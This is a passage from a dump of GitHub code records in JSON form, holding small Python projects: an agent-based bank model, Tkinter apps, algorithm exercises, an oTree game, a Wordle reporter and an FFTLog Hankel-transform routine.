len(rich_agents)\n\ndef get_num_poor_agents(model):\n \"\"\"return number of poor agents\"\"\"\n poor_agents = [a for a in model.schedule.agents if a.is_small()]\n return len(poor_agents)\n\ndef get_num_mid_agents(model):\n \"\"\"return number of middle class agents\"\"\"\n mid_agents = [a for a in model.schedule.agents if a.is_medium()]\n return len(mid_agents)\n\ndef get_l_crisis(model):\n return model.bank.l_crisis\n\ndef get_total_savings(model):\n \"\"\"sum of all agents' savings\"\"\"\n agent_savings = [a.savings for a in model.schedule.agents]\n # return the sum of agents' savings\n return float(np.sum(agent_savings))\n\ndef get_number_transactions(model):\n return len(model.p_history)\n\ndef get_total_cash(model):\n \"\"\"sum of amounts of all cash in economy\"\"\"\n agent_cash = [a.cash for a in model.schedule.agents]\n # return the sum of all agents' wallets\n return float(np.sum(agent_cash))\n\ndef get_total_valuation(model):\n # sum of all agents' valuations\n firm_valuation = [a.valuation() for a in model.schedule.agents]\n return 
np.sum(firm_valuation)\n\ndef get_total_assets(model):\n agent_asset0s = [a.asset0 for a in model.schedule.agents]\n return float(np.sum(agent_asset0s))\n\ndef get_total_loans(model):\n # list of amounts of all agents' loans\n agent_loans = [a.loans for a in model.schedule.agents]\n # return sum of all agents' loans\n return float(np.sum(agent_loans))\n\ndef get_avg_p_asset0(model):\n return model.p_asset0\n\nclass BankReserves(mesa.Model):\n \"\"\"\n This model is a Mesa implementation of the Bank Reserves model from NetLogo.\n It is a highly abstracted, simplified model of an economy, with only one\n type of agent and a single bank representing all banks in an economy. People\n (represented by circles) move randomly within the grid. If two or more people\n are on the same grid location, there is a 50% chance that they will trade with\n each other. If they trade, there is an equal chance of giving the other agent\n $5 or $2. A positive trade balance will be deposited in the bank as savings.\n If trading results in a negative balance, the agent will try to withdraw from\n its savings to cover the balance. If it does not have enough savings to cover\n the negative balance, it will take out a loan from the bank to cover the\n difference. The bank is required to keep a certain percentage of deposits as\n reserves and the bank's ability to loan at any given time is a function of\n the amount of deposits, its reserves, and its current total outstanding loan\n amount.\n \"\"\"\n\n # grid height\n grid_h = 20\n # grid width\n grid_w = 20\n\n \"\"\"init parameters \"init_people\", \"rich_threshold\", and \"reserve_percent\"\n are all set via Slider\"\"\"\n\n def __init__(\n self,\n height=grid_h,\n width=grid_w,\n init_people=2,\n rich_threshold=10,\n poor_threshold = 5,\n reserve_percent=50,\n deposit_interest=1,\n loan_interest=2,\n risk_mu = 5,\n risk_sigma = 5,\n risk_preference = 0.5,\n p_asset0 = 10,\n fed_interest = 2,\n eta = 0.5,\n birthrate = 0.0,\n deathrate = 0.0,\n ):\n self.height = height\n self.width = width\n self.init_people = init_people\n self.schedule = mesa.time.RandomActivation(self)\n self.grid = mesa.space.MultiGrid(self.width, self.height, torus=True)\n # rich_threshold is the amount of savings a person needs to be considered \"rich\"\n self.rich_threshold = rich_threshold\n self.poor_threshold = poor_threshold\n self.reserve_percent = reserve_percent\n self.deposit_interest = deposit_interest\n self.loan_interest = loan_interest\n self.p_asset0 = p_asset0\n self.fed_interest = fed_interest\n self.p_history = []\n self.eta = eta\n self.birthrate = birthrate\n self.current_id = 0\n self.deathrate = deathrate\n \n \n # set risk asset profit and variance\n self.risk_mu = risk_mu\n self.risk_sigma = risk_sigma\n \n # set risk preference\n self.risk_preference = risk_preference\n \n # see datacollector functions above\n self.datacollector = mesa.DataCollector(\n model_reporters={\n \"Big\": get_num_big_agents,\n \"Bankrupt\": get_num_bankrupt_agents,\n \"Small\": get_num_non_big_agents,\n \"Total Savings\": get_total_savings,\n \"Total Valuation\": get_total_valuation,\n \"Total Assets\": get_total_assets,\n \"Total Loans\": get_total_loans,\n \"Average Price of Asset\": get_avg_p_asset0,\n \"Total Bank Liquidity Crisis\": get_l_crisis,\n \"Number of Transactions\": get_number_transactions,\n \"Total Cash\": get_total_cash,\n \"Operating\": get_num_op_agents,\n \"Not Operating\": get_num_n_op_agents,\n },\n agent_reporters={\"Valuation\": lambda x: x.valuation()},\n )\n\n # 
create a single bank for the model\n self.bank = Bank(1, self, self.reserve_percent, \n self.deposit_interest, self.loan_interest, self.risk_preference)\n\n # create people for the model according to number of people set by user\n for i in range(self.init_people):\n self.create_firm(self.bank)\n\n self.running = True\n self.datacollector.collect(self)\n \n\n def create_firm(self, bank, **kwargs):\n # set x, y coords randomly within the grid\n x = self.random.randrange(self.width)\n y = self.random.randrange(self.height)\n p = Firm(self.next_id(), (x, y), self, True, bank, deathrate=self.deathrate, **kwargs)\n # place the Firm object on the grid at coordinates (x, y)\n self.grid.place_agent(p, (x, y))\n # add the Firm object to the model schedule\n self.schedule.add(p)\n\n def adjust_p_asset0(self):\n if len(self.p_history) > 0:\n # exponential moving average toward the mean traded price; assumes the original '+= ... - (1-eta)*p' was a sign slip\n self.p_asset0 = self.eta * np.average(self.p_history) + (1 - self.eta) * self.p_asset0\n self.p_history = []\n \n def report_p_asset0(self, p):\n self.p_history += [p]\n print('traded')\n\n def firm_birth(self):\n if self.random.random() < self.birthrate:\n self.create_firm(self.bank)\n print(\"birth\")\n\n def step(self):\n # bank adjusts interest rates\n self.bank.adjust_rates()\n # tell all the agents in the model to run their step function\n self.schedule.step()\n # collect data\n self.datacollector.collect(self)\n # adjust average p_asset0 prices\n self.adjust_p_asset0()\n # create new firms\n self.firm_birth()\n\n def run_model(self):\n for i in range(self.run_time):\n self.step()","repo_name":"jonathanmli/agent-based-modelling","sub_path":"bank_reserve/bank_asset/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
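The `adjust_p_asset0` fix above assumes an exponential moving average was intended; a standalone sketch of the corrected update:

```python
import numpy as np

eta = 0.5
p_asset0 = 10.0
for traded_prices in ([12.0, 14.0], [8.0]):
    # p <- eta * mean(recent trades) + (1 - eta) * p
    p_asset0 = eta * np.average(traded_prices) + (1 - eta) * p_asset0
print(p_asset0)  # 0.5*8 + 0.5*(0.5*13 + 0.5*10) = 9.75
```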
+{"seq_id":"2703051227","text":"from classes import *\r\n\r\n\r\nclass MainPage(mtk.Tk):\r\n\r\n def __init__(self, *args, **kwargs):\r\n mtk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.title(\" \")\r\n self.geometry(\"500x500\")\r\n\r\n container = mtk.Frame(self)\r\n container.pack(side=\"top\", fill=\"both\", expand=True)\r\n container.grid_rowconfigure(0, weight=1)\r\n container.grid_columnconfigure(0, weight=1)\r\n\r\n self.frames = {}\r\n all_frames = (startPage, loginPage, votePage, resultsPage)\r\n\r\n for F in all_frames:\r\n page_name = F.__name__\r\n frame = F(parent=container, controller=self)\r\n self.frames[page_name] = frame\r\n\r\n frame.grid(row=0, column=0, sticky=\"nsew\")\r\n \r\n self.show_frame(\"votePage\")\r\n\r\n def show_frame(self, page_name):\r\n frame = self.frames[page_name]\r\n frame.tkraise()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = MainPage()\r\n app.mainloop()\r\n","repo_name":"santhanh3000/voting-app","sub_path":"system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17105429639","text":"# read N and K, split on whitespace, convert to int (map)\nn, k = map(int, input().split())\n\nresult = 0\n\nwhile True:\n    # subtract 1 until n is divisible by k\n    target = (n // k) * k\n    result += n - target # add the number of subtract-1 operations to result\n    n = target\n\n    # exit the loop when n is smaller than k (no more division possible)\n    if n < k:\n        break\n\n    # divide by k\n    result += 1\n    n //= k\n\n# subtract 1 repeatedly for whatever remains\n# if n is still greater than 1, those subtractions are needed too; add that count to result\nresult += (n - 1)\nprint(result)  # was print(1), which discarded the computed answer\n","repo_name":"bmh8993/coding-test","sub_path":"dongbin-cote/1이_될_때까지/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
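A quick brute-force cross-check of the greedy above (my own test harness, not part of the original solution):

```python
from functools import lru_cache

def greedy_ops(n, k):
    result = 0
    while True:
        target = (n // k) * k
        result += n - target
        n = target
        if n < k:
            break
        result += 1
        n //= k
    return result + (n - 1)

@lru_cache(maxsize=None)
def min_ops(n, k):
    # exhaustive reference: at each step either subtract 1 or divide by k
    if n == 1:
        return 0
    best = min_ops(n - 1, k) + 1
    if n % k == 0:
        best = min(best, min_ops(n // k, k) + 1)
    return best

assert all(greedy_ops(n, k) == min_ops(n, k) for k in (2, 3, 5) for n in range(1, 200))
print(greedy_ops(25, 3))  # 6
```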
+{"seq_id":"39757080359","text":"from collections import deque\n\ndef bagOfTokensScore(tokens, power):\n    output = 0\n    queue = deque(sorted(tokens))\n    score = 0\n    while queue and (queue[0] <= power or score):\n        if queue[0] <= power:\n            power -= queue.popleft()\n            score += 1\n        else:\n            power += queue.pop()\n            score -= 1\n        output = max(output,score)\n    return output\n\n# Sort the tokens array and transform it into a deque\n# Greedily take the lowest tokens and if power is smaller than the first token\n# in the queue and score is greater than 0, take the highest token.\n# O(nlogn), O(n) space\ntokens = [100]\npower = 50\nmaximumScore = bagOfTokensScore(tokens,power)\nprint(maximumScore)\n","repo_name":"patchangg/LeetCode","sub_path":"Python/Medium/948.py","file_name":"948.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30259397714","text":"from otree.api import (\n    models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n    Currency as c, currency_range\n)\n\n\ndoc = \"\"\"\nThis is a one-shot \"Prisoner's Dilemma\". Two players are asked separately\nwhether they want to cooperate (Kooperieren) or defect (Alleingang). Their choices\ndirectly determine the payoffs.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n    name_in_url = 'prisoner'\n    players_per_group = 2\n    num_rounds = 1\n\n    instructions_template = 'prisoner/instructions.html'\n\n    # payoff if one player defects (Alleingang) and the other cooperates (Kooperieren)\n    betray_payoff = 3\n    betrayed_payoff = 0\n\n    # payoff if both players cooperate or both defect\n    both_cooperate_payoff = 2\n    both_defect_payoff = 1\n\nclass Subsession(BaseSubsession):\n    pass\n\nclass Group(BaseGroup):\n    pass\n\nclass Player(BasePlayer):\n    payoff_cur = models.IntegerField()\n\n    decision = models.StringField(\n        choices=['Cooperate', 'Defect'],\n        doc=\"\"\"This player's decision\"\"\",\n        widget=widgets.RadioSelect\n    )\n\n    def other_player(self):\n        return self.get_others_in_group()[0]\n\n    def set_payoff(self):\n\n        payoff_matrix = dict(\n            Cooperate=dict(\n                Cooperate=Constants.both_cooperate_payoff,\n                Defect=Constants.betrayed_payoff\n            ),\n            Defect=dict(\n                Cooperate=Constants.betray_payoff,\n                Defect=Constants.both_defect_payoff\n            )\n        )\n\n        if self.decision == '' or self.other_player().decision == '':\n            self.payoff_cur = 0\n        else:\n            self.payoff_cur = payoff_matrix[self.decision][self.other_player().decision]\n","repo_name":"Schmidtpk/Otree-ambiguity","sub_path":"prisoner/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33906548245","text":"'''\nReturns True if n is prime and False otherwise.\n'''\n\ndef is_prime (n):\n    if n < 2:\n        return False\n    else:\n        i = 2\n        while i * i <= n:\n            if n % i == 0:\n                return False\n            i = i + 1\n        return True\n\n'''\nReturns the product of the numbers in the list lst.\n'''\n\ndef get_product (lst):\n    product=1\n    for i in (lst):\n        product=product*i\n    return product\n\n'''\nReturns the GCD of two numbers x and y using the first algorithm (repeated subtraction).\n'''\n\ndef get_cmmdc_1(x, y):\n    while x != y:\n        if x > y:\n            x = x - y\n        else:\n            y = y - x\n    return x\n\n'''\nReturns the GCD of two numbers x and y using the second algorithm (Euclidean remainders).\n'''\n\ndef get_cmmdc_2(x, y):\n    while y != 0:\n        r = x % y\n        x = y\n        y = r\n    return x\n\ndef main():\n    val = False\n    while not val:\n        print(\"1.Verificare nr prim \")\n        print(\"2. Produs a n numere\")\n        print(\"3.CMMDC varianta 1\")\n        print(\"4.CMMDC varianta 2\")\n        print(\"x. Exit\")\n        optiune = input()\n        if optiune == '1':\n            nr = int(input(\"Scrieti un nr: \"))\n            print(is_prime(nr))\n        elif optiune =='2':\n            text = input(\"Adaugati nr separate prin virgula: \")\n            lst = text.split(',')\n            for i, x in enumerate(lst):\n                lst[i]=int(x)\n            print(get_product(lst))\n        elif optiune == '3':\n            a = int(input())\n            b = int(input())\n            print(get_cmmdc_1(a, b))\n        elif optiune == '4':\n            a = int(input())\n            b = int(input())\n            print(get_cmmdc_2(a, b))\n        elif optiune == 'x':\n            val = True\n        else:\n            print(\"Optiune incorecta\")\n\nif __name__ == '__main__':\n    main()\n\n\n\n\n\n\n\n\n","repo_name":"AP-MI-2021/lab-1-EduardBarna","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
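Both GCD variants above compute the same function; a small property check over positive integers (standalone):

```python
from math import gcd

def gcd_subtraction(x, y):  # the first algorithm: repeated subtraction
    while x != y:
        if x > y:
            x = x - y
        else:
            y = y - x
    return x

def gcd_remainder(x, y):    # the second algorithm: Euclidean remainders
    while y != 0:
        x, y = y, x % y
    return x

for a in range(1, 30):
    for b in range(1, 30):
        assert gcd_subtraction(a, b) == gcd_remainder(a, b) == gcd(a, b)
print("ok")
```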
+{"seq_id":"31512440177","text":"# Data Structure HW_1\n# use python3.6\n# Edit by 劉岳樺_B10330010\n# Expression Converter\ninfix = []\npost_result = []\ntop = -1\nMAX = 50\nstack = [] * MAX\npost_answer = \"\"\npre_answer = \"\"\n\n\ndef push(st, val):\n    global top\n    if top == MAX-1:\n        print('Stack Overflow!!!!')\n    else:\n        top += 1\n        print('do PUSH~')\n        st.insert(top, val)\n\n\ndef pop(st):\n    global top\n    if top == -1:\n        print('Stack Underflow!!')\n        return -1\n    else:\n        k = st[top]\n        top -= 1\n        print('do POP~')\n        return k\n\n\ndef infix_to_postfix(content):\n    # converting starts here\n    push(stack, '(')\n    content += ')'\n    for i in content:\n        print(\"Now scan to:\", i)\n        if i == ')':\n            while not(stack[top] == '('):\n                print(\"Meet ')' \")\n                post_result.append(pop(stack))\n                print(\"Stack:\", stack)\n                print(\"postfix:\", post_result, \"\n\")\n            if stack[top] == '(':\n                pop(stack)\n        elif not ((i == '(')or(i == '+')or(i == '-')or(i == '*')or(i == '/')or(i == '%')):\n            post_result.append(i)\n            print(\"Stack:\", stack)\n            print(\"postfix:\", post_result, \"\n\")\n\n        else:\n            if i == '(':\n                push(stack, i)\n                print(\"Stack:\", stack)\n                print(\"postfix:\", post_result, \"\n\")\n            # handle the * case:\n            elif i == '*':\n                if stack[top] == '*':\n                    post_result.append(pop(stack))\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif (stack[top] == '/') or (stack[top] == '%'):\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n            # handle the / case\n            elif i == '/':\n                if (stack[top] == '*') or (stack[top] == '/'):\n                    post_result.append(pop(stack))\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif stack[top] == '%':\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n            # handle the % case\n            elif i == '%':\n                if (stack[top] == '*') or (stack[top] == '/') or (stack[top] == '%'):\n                    post_result.append(pop(stack))\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n            # handle the + and - cases\n            elif (i == '+') or (i == '-'):\n                if (stack[top] == '*') or (stack[top] == '/') or (stack[top] == '%'):\n                    post_result.append(pop(stack))\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                elif (stack[top] == '+') or (stack[top] == '-'):\n                    post_result.append(pop(stack))\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n\n                else:\n                    push(stack, i)\n                    print(\"Stack:\", stack)\n                    print(\"postfix:\", post_result, \"\n\")\n    print(\"========== convert end ==========\", \"\n\n\")\n    return post_result\n\n\ndef infix_to_prefix(content):\n    rev_content = []\n    pre_ans = []\n    print(\"========== prefix convert start ==========\")\n    for i in content:\n        if i == '(':\n            i = ')'\n        elif i == ')':\n            i = '('\n        rev_content.insert(0, i)\n\n    ans = infix_to_postfix(rev_content)\n\n    for i in ans:\n        pre_ans.insert(0, i)\n    return pre_ans\n\n\nprint('This is an Expression Converter\\n')\ninfix = input('輸入一段infix計算式:')\n\n# show the postfix result\nfor x in infix_to_postfix(infix):\n    post_answer += x\n\n# post_result and stack clean\n# convert into prefix\npost_result.clear()\nstack.clear()\ntop = -1\nfor x in infix_to_prefix(infix):\n    pre_answer += x\n\nprint(\"***************************\")\nprint(\"***************************\")\nprint(\"The postfix is : \" + post_answer)\nprint(\"The prefix is :\" + pre_answer)\nprint(\"***************************\")\nprint(\"***************************\")\nprint(\"\\n\\nPress Enter to Continue...\")\ninput()\n","repo_name":"Yuehua-Liu/ExpressionConverter","sub_path":"ExpressionConvertor.py","file_name":"ExpressionConvertor.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72784899770","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom threading import Thread\nimport math\n\nwindow = tk.Tk()\nwindow.geometry(\"300x150\")\n\nlbl = tk.Label(window, text=\"Press Start\")\nlbl.place(width=280, height=60, x=10, y=10)\n\npb = ttk.Progressbar(window)\npb.place(width=280, height=25, x=10, y=80)\n\ndef calculate():\n    \"\"\" sum of 1 / i^2 = PI^2 / 6 (Basel problem), so sqrt(6*s) converges to PI \"\"\"\n    s = 0.0\n    for i in range(1, 10000001):\n        s += (1 / i**2)\n        if i % 1000000 == 0:\n            value = math.sqrt(s * 6)\n            lbl.config(text=value) # updating a widget from a worker thread; Tkinter does not guarantee this is thread-safe\n            pb.step(10) # advance the progress bar by 10 of its default 100 units\n\ndef start():\n    lbl.config(text=\"Press Start\")\n    #calculate() # calling this directly would block the mainloop and freeze the GUI\n    t = Thread(target=calculate)\n    t.start()\n\nbtn = tk.Button(window, text=\"Start\", command=start)\nbtn.place(width=280, height=25, x=10, y=115)\n\nwindow.mainloop()","repo_name":"alissonws/SemabioToolKit","sub_path":"interface/teste threads.py","file_name":"teste threads.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36054868211","text":"\r\nclass Node:\r\n    def __init__(self, val=None):\r\n        self.left = None\r\n        self.right = None\r\n        self.val = val\r\n    def insert(self, val):\r\n        if not self.val:\r\n            self.val = val\r\n            return\r\n        if self.val == val:\r\n            return\r\n        elif val < self.val:\r\n            if self.left:\r\n                self.left.insert(val)\r\n                return\r\n            self.left = Node(val)\r\n            return\r\n        else:\r\n            if self.right:\r\n                self.right.insert(val)\r\n                return\r\n            self.right = Node(val)\r\n    def search(self, item):\r\n        if self.val is None:\r\n            return None\r\n        
if item == self.val:\r\n return self.val\r\n if item < self.val:\r\n if self.left is None:\r\n return None\r\n return self.left.search(item)\r\n if self.right is None:\r\n return None\r\n return self.right.search(item)\r\n def __in_order(self, result):\r\n if self.left is not None:\r\n result = self.left.__in_order(result)\r\n \r\n result.append(self.val)\r\n\r\n if self.right is not None:\r\n result = self.right.__in_order(result)\r\n return result\r\n def nodes(self):\r\n \r\n result = []\r\n result = self.__in_order(result)\r\n \r\n return result\r\n \r\n\r\n","repo_name":"marihabdi/Bank","sub_path":"Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20613119650","text":"from typing import List\nfrom colorama import Fore\n\nfrom wordle.wordle import Wordle\nfrom wordle.letter_state import LetterState\n\nclass Reporter:\n def __init__(self, wordle: Wordle):\n self.wordle = wordle\n\n def report(self, **kwargs):\n if kwargs.get('initial_message'):\n print(Fore.CYAN + \"\\nPress ctrl + C to Give Up\" + Fore.RESET)\n if kwargs.get('game_configs'):\n print(Fore.GREEN + f\"\\nGame Mode: \" + Fore.RESET + f\"{self.wordle._game_mode}\\n\"\n + Fore.GREEN + \"Word Length: \" + Fore.RESET + f\"{self.wordle.word_length}\")\n if kwargs.get('characters_exceeded'):\n print(Fore.RED + f\"Word must be {self.wordle.word_length} characters long!\" + Fore.RESET)\n elif kwargs.get('word_not_found'):\n print(Fore.RED + \"Word provided does not exist in the English dictionary.\" + Fore.RESET)\n elif kwargs.get('final_message'):\n print(f\"You've solved the puzzle in {self.wordle.taken_attempts} attempts!\") if self.wordle.is_solved\\\n else print(f\"\\nYou failed to solve the puzzle\\nThe answer was {Fore.CYAN + self.wordle.instance_secret + Fore.RESET}.\")\n elif kwargs.get('give_up'):\n print(\"\\n\\nYou Gave Up!\")\n print(f\"The answer was {self.wordle.instance_secret}.\")\n if self.wordle.attempts:\n self.display_results(give_up=True)\n print(\"Exiting...\")\n\n def _convert_result_to_color(self, result: List[LetterState])-> str:\n result_with_color = []\n\n for letter in result:\n if letter.is_in_position:\n color = Fore.GREEN\n elif letter.is_in_word:\n color = Fore.YELLOW\n else:\n color = Fore.WHITE\n \n colored_letter = color + letter.character + Fore.RESET\n result_with_color.append(colored_letter)\n\n return \" \".join(result_with_color)\n\n @staticmethod\n def _draw_game_board(lines: List[str], word_length: int, size: int = 9, padding: int = 1):\n content_length = (size + padding * 2) * word_length // 5\n\n top_border = \"┌\" + \"─\" * content_length + \"┐\"\n bottom_border = \"└\" + \"─\" * content_length + \"┘\"\n space = \" \" * padding\n\n print(top_border)\n for line in lines:\n print(\"│\" + space + line + space + \"│\")\n print(bottom_border)\n\n @staticmethod\n def _draw_keyboard(keyboard: List[dict]):\n for row in keyboard:\n print(' '.join(row.values()))\n\n def display_results(self, give_up=False):\n if not give_up:\n print(\"\\nYour results so far...\")\n print(f\"You have {self.wordle.remaining_attempts} attempts remaining.\")\n\n lines = []\n\n for word in self.wordle.attempts:\n result = self.wordle.guess(word)\n colored_result_str = self._convert_result_to_color(result=result)\n self.wordle.update_keyboard(result=result)\n lines.append(colored_result_str)\n\n for _ in range(self.wordle.remaining_attempts):\n lines.append(\" \".join([\"_\"] * 
self.wordle.word_length))\n\n print('\\n')\n if not give_up:\n print(f'- Attempt {self.wordle.taken_attempts} -')\n Reporter._draw_game_board(lines=lines, word_length=self.wordle.word_length)\n print('\\n')\n Reporter._draw_keyboard(keyboard=self.wordle.keyboard)\n print('-------------')\n","repo_name":"tiagovmvieira/Wordle","sub_path":"wordle/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10559416746","text":"import heapq\r\ndef solution(scoville, K):\r\n heap=[]\r\n for i in scoville:\r\n heapq.heappush(heap,i)\r\n \r\n count=0\r\n while heap[0]cut]\n\tasym_plus=(mu+1+asym_q)/2.\n\tasym_minus=(mu+1-asym_q)/2.\n\t\n\tq_good=q[ (np.absolute(imag_q) <=cut) & (q!=mu + 1 + 0.0j)]\n\n\talpha_plus=(mu+1+q_good)/2.\n\talpha_minus=(mu+1-q_good)/2.\n\t\n\tg_m[(np.absolute(imag_q) <=cut) & (q!= mu + 1 + 0.0j)] =gamma(alpha_plus)/gamma(alpha_minus)\n\n\t# high-order expansion\t\t\t\t\t\t\n\tg_m[np.absolute(imag_q)>cut] = exp( (asym_plus-0.5)*log(asym_plus) - (asym_minus-0.5)*log(asym_minus) - asym_q \\\n\t +1./12 *(1./asym_plus - 1./asym_minus) +1./360.*(1./asym_minus**3 - 1./asym_plus**3) +1./1260*(1./asym_plus**5 - 1./asym_minus**5) )\n\n\tg_m[np.where(q==mu+1+0.0j)[0]] = 0.+0.0j\n\t\n\treturn g_m\n\ndef log_gamma(z):\n\t\n\tz=gamma(z)\n\tw=log(z)\n\tx=np.real(w)\n\ty=np.imag(w)\n\treturn x,y\n\t\ndef get_k0(N,mu,q,r0,L,k0):\n\t\t\n\tkr=float(k0*r0)\n\tdelta_L=L/float(N)\n\t\n\tx=q + 1j*pi/delta_L\n\t\n\tx_plus=(mu+1+x)/2.\n\tx_minus=(mu+1-x)/2.\n\t\t\n\trp,phip=log_gamma(x_plus)\n\trm,phim=log_gamma(x_minus)\n\t\n\targ=log(2/kr)/delta_L + (phip - phim)/pi \n\tiarg=np.rint(arg)\n\tif ( arg != iarg):\n\t\tkr=kr*exp((arg-iarg)*delta_L)\n\t\t#kr=kr*exp((arg+iarg)*delta_L)\t\t# Hamilton sign \n\t\n\treturn kr \n\t\ndef u_m_vals_old(m,mu,q,kr,L):\n\n\tx=q + 1j*2*pi*m/L\n\t\n\talpha_plus=(mu+1+x)/2.\n\talpha_minus=(mu+1-x)/2.\n\t\t\n\trp, phip=log_gamma(alpha_plus) \n\trm, phim=log_gamma(alpha_minus) \n\t\n\tlog_r=q*log2 + rp - rm \n\tphi=2*pi*m/L*log(2./kr) + phip - phim \n\t\n\treal_part=exp(log_r)*cos(phi)\n\timag_part=exp(log_r)*sin(phi) \n\t\n\tu_m=real_part + 1j*imag_part \n\t\n\t# adjust endpoint, the N/2=m.size point \n\tu_m[m.size-1]=np.real(u_m[m.size-1])\n\treturn u_m\n\t\ndef u_m_vals(m,mu,q,kr,L):\n\n omega=1j*2*pi*m/L\n\n x=q + omega\n \n two_part=2**x \n \n U_mu=2**x*g_m_vals(mu,x)\n \n u_m=(kr)**(-omega)*U_mu\n \n u_m[m.size-1]=np.real(u_m[m.size-1])\n \n return u_m \n \ndef fft_log(k,f_k,q,mu):\n\n\n\tif ((q+mu) < -1) :\n\t\tprint('Error in reality condition for Bessel function integration.')\n\t\tprint(' q+mu is less than -1.')\n\t\tprint('See Abramowitz and Stegun. Handbook of Mathematical Functions pg. 486')\n\t\t\n\t\n\tif ( q > 1/2.) :\n\t\tprint('Error in reality condition for Bessel function integration.')\n\t\tprint(' q is greater than 1/2')\n\t\tprint('See Abramowitz and Stegun. Handbook of Mathematical Functions pg. 
486')\n\n\t\t\t\t\t\t\n\tN=f_k.size\n\tdelta_L=(log(np.max(k))-log(np.min(k)))/float(N-1)\n\t#delta_L10=(np.log10(np.max(k))-np.log10(np.min(k)))/(N-1)\n\tL=(log(np.max(k))-log(np.min(k)))\n\t\t\n\t# find a better way to check if it is evenly spaced in log \n\tdiff=np.diff(np.log(k))\n\tdiff=np.diff(diff)\n\tif (np.sum(diff) >=1e-10):\n\t\tprint('You need to send in data that is sampled evenly in logspace')\n\t\tprint('Terminating code in fft_log')\n\t\tsys.exit()\n\t\t\n\t\n\tlog_k0=log(k[N//2])\n\tk0=exp(log_k0)\n\t\n\t# Fourier transform input data \n\t# get m values, shifted so the zero point is at the center\n\t\n\tc_m=rfft(f_k)\n\tm=np.fft.rfftfreq(N,d=1.)*float(N)\n\t# make r vector \n\t#kr=get_k0(float(N),mu,q,1/k0,L,k0)\n\tkr=1\n\tr0=kr/k0\n\tlog_r0=log(r0)\n\t\n\tm=np.fft.rfftfreq(N,d=1.)*float(N)\n\tm_r=np.arange(-N//2,N//2)\n\tm_shift=np.fft.fftshift(m_r)\n\t\n\t\n\t#s-array \n\ts=delta_L*(-m_r)+log_r0\t\t\n\tid=m_shift\n\tr=10**(s[id]/log(10))\n\t\n\t#m_shift=np.fft.fftshift(m)\n\t\n\t# get h array \t\n\th=delta_L*m + log_k0\n\t\t\n\tu_m=u_m_vals(m,mu,q,kr,L)\n\t#u_m=u_m_vals_old(m,mu,q,kr,L) old version will crash for large data set \n\n\tb=c_m*u_m\n\t\t\n\tA_m=irfft(b)\n\t\n\tA=A_m[id]\n\t\n\t# reverse the order \n\tA=A[::-1]\n\tr=r[::-1]\n\t\n\tif (q!=0):\n\t\tA=A*(r)**(-float(q))\n\t\t\n\treturn r, A \n\n##########################################################################################\n# End of fftlog algorithm \n\n\n\n##########################################################################################\n# function specific for power spectrum to correlation function (and vice versa) in \n# cosmology \ndef k_to_r(k,f_k,alpha_k=1.5, beta_r=-1.5, mu=.5, pf=(2*pi)**(-1.5),q=0):\n\t\n\t# module to calculate Hankel Transform\n\t# \\int_0^\\infty dk r A(k) J_mu(kr), via fftlog algorithm\n\t# Common application is for power spectrum:\n\t# \\xi(r)= \\int dk k^2 /(2 \\pi^2) \\sin(kr)/kr P(k) \n\t# in which case \n\t# alpha_k=1.5\n\t# beta_r=-1.5\n\t# mu=.5 \n\t# pf=(2*np.pi)**(-1.5)\n\t\n\tf_k=k**alpha_k*f_k\n\t\n\tr, A=fft_log(k,f_k,q,mu)\n\n\tf_r=pf*A*r**beta_r \n\n\treturn r, f_r \n\t\ndef r_to_k(r,f_r,alpha_k=-1.5, beta_r=1.5, mu=.5, 